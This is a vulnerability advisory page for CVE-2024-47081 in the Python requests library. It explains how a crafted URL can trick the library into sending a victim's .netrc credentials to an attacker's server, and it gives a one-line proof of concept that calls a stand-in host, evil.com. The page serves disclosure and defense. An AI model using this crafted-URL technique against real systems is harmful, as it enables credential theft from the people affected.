Insertion of Sensitive Information Into Sent Data in requests | CVE-2024-47081

Q: How to fix?

A fix was pushed into the master branch but not yet published.

Threat Intelligence

Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk IDSNYK-PYTHON-REQUESTS-10305723
published6 Jun 2025
disclosed4 Jun 2025
creditJuho Forsén

Report a new vulnerability Found a mistake?

Introduced: 4 Jun 2025

NewCVE-2024-47081 (opens in a new tab) CWE-201 (opens in a new tab)

How to fix?

A fix was pushed into the master branch but not yet published.

Overview

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data due to incorrect URL processing. An attacker could craft a malicious URL that, when processed by the library, tricks it into sending the victim's .netrc credentials to a server controlled by the attacker.

Note:

This is only exploitable if the .netrc file contains an entry for the hostname that the attacker includes in the crafted URL's "intended" part (e.g., example.com in http://example.com:@evil.com/).

PoC

requests.get('http://example.com:@evil.com/&apos;)

References

CVSS Base Scores

version 4.0

version 3.1

Attack Vector (AV)
Network
Attack Complexity (AC)
Low
Attack Requirements (AT)
Present
Privileges Required (PR)
Low
User Interaction (UI)
Active

Confidentiality (VC)
High
Integrity (VI)
None
Availability (VA)
None

Confidentiality (SC)
None
Integrity (SI)
None
Availability (SA)
None

Insertion of Sensitive Information Into Sent Data Affecting requests package, versions [0,]

Severity